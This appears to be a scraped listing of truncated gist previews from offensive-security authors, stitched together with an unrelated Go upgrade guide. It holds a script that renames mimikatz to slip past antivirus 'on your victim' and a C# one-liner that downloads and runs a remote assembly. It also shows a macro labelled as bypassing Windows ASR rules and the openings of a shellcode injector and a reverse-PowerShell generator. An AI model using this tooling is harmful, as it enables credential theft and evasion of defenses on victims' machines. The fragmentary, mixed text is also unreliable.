imaibou

# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ..., 
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'

nikhita

How to update the Go version

System: Debian/Ubuntu/Fedora. Might work for others as well.

1. Uninstall the exisiting version

As mentioned here, to update a go version you will first need to uninstall the original version.

To uninstall, delete the /usr/local/go directory by:

HarmJ0y

# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

rsmudge

#
# safe delete in file browser right-click menu
#
popup_clear("filebrowser");

popup filebrowser {
	item "&Download" {
		local('$file');
		foreach $file ($3) {
			bdownload($1, "$2 $+ \\ $+ $file");

xpn

#include "stdafx.h"

int main()
{
	ICLRMetaHost *metaHost = NULL;
	IEnumUnknown *runtime = NULL;
	ICLRRuntimeInfo *runtimeInfo = NULL;
	ICLRRuntimeHost *runtimeHost = NULL;
	IUnknown *enumRuntime = NULL;
	LPWSTR frameworkName = NULL;

cobbr

public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }

edermi

infosecn1nja

' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

Sub ASR_blocked()
    Dim WSHShell As Object
    Set WSHShell = CreateObject("Wscript.Shell")
    WSHShell.Run "cmd.exe"
End Sub

TheWover

/*  Author: TheWover
    Description: Injects embedded base64-encoded shellcode into an arbitrary hardcoded process using native Windows 32 API calls.

    Last Modified: 11/1/2018
 */
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace ShellcodeTest

tothi

#!/usr/bin/env python3
#
# generate reverse powershell cmdline with base64 encoded args
#

import sys
import base64

def help():
    print("USAGE: %s IP PORT" % sys.argv[0])